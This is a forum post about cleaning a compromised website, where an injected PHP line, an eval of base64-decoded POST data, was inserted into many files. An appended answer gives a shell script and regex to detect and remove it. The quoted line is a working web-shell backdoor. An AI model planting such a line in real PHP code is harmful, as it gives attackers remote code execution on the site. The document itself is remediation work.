Invader Zim
A client has a website with a huge amount of php files where base64_decode lines were inserted. It usually looks like this:
Code:
<?php eval(base64_decode($_POST['n6c3958']));?><?php
Note that after the initial <?php there is a variable number of spaces until 'eval'. The 7 characters after the POST are also variable, but usually 7 characters long. And then it ends with the original <?php
So I've tried to remove this with perl (variable number of spaces, variable characters after POST) and remove everything up to the original <?php at the end.
I put it in a script for future use because it has happened before and it will probably happen again. This is what I have:
Code:
#!/usr/local/bin/bash
for FILE in `grep -r base64_decode *.php | grep POST | awk -F : '{print $1}'` ; do
echo "File "$FILE
sed -i '' 's/\<\?php\s+eval\(base64_decode\(\$\_POST\[.{9}\]\)\)\;\?\>//g' $FILE
done
We search all the files for base64_decode and then remove the string.
At least, that was the intention. All it does is reduce all files to 0 length. Not exactly helpful. I can't figure out where I went wrong.
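One way to strip the injected block described in the post above, as an added example that is not part of the original post: it writes the result to a temporary file and refuses to overwrite the original with an empty or still-matching result, which guards against the zero-length outcome. The function names, the `.infected.bak` suffix, the 1 to 40 character key length, and the assumption that the injected block sits on a single line are choices made for this example.

```sh
#!/bin/sh
# Added example, not the poster's script. Names and backup suffix are assumptions.

# ERE for the injected block: "<?php", optional whitespace, the eval call with
# any short $_POST key, then "?>". [[:space:]] is used because \s is not
# portable across sed implementations.
INJECT_RE='<\?php[[:space:]]*eval\(base64_decode\(\$_POST\[[^]]{1,40}]\)\);[[:space:]]*\?>'

# clean_php_file FILE
# Returns 0 if the block was removed, 1 if FILE had no match, 2 on error.
clean_php_file() {
    file=$1
    grep -Eq "$INJECT_RE" "$file" || return 1
    tmp=$(mktemp "${file}.XXXXXX") || return 2
    # Write to a temp file instead of using sed -i, whose argument syntax
    # differs between GNU and BSD sed.
    if ! sed -E "s/${INJECT_RE}//g" "$file" > "$tmp"; then
        rm -f "$tmp"; return 2
    fi
    # Refuse to replace the original with an empty or still-infected result.
    if [ ! -s "$tmp" ] || grep -Eq "$INJECT_RE" "$tmp"; then
        rm -f "$tmp"; return 2
    fi
    # Keep a copy of the infected file for later analysis.
    cp -p "$file" "${file}.infected.bak" || { rm -f "$tmp"; return 2; }
    # Overwrite in place so FILE keeps its owner and mode.
    cat "$tmp" > "$file" || return 2
    rm -f "$tmp"
}

# clean_tree DIR
# Cleans every *.php under DIR (including subdirectories) and reports each file.
clean_tree() {
    grep -rlE --include='*.php' "$INJECT_RE" "$1" | while IFS= read -r f; do
        if clean_php_file "$f"; then
            echo "cleaned: $f"
        else
            echo "needs review: $f"
        fi
    done
}

# Run on the directories given on the command line, if any.
for dir in "$@"; do clean_tree "$dir"; done
```

The `.infected.bak` copies still contain the injected code, so move them out of the web root once the cleaned files have been checked.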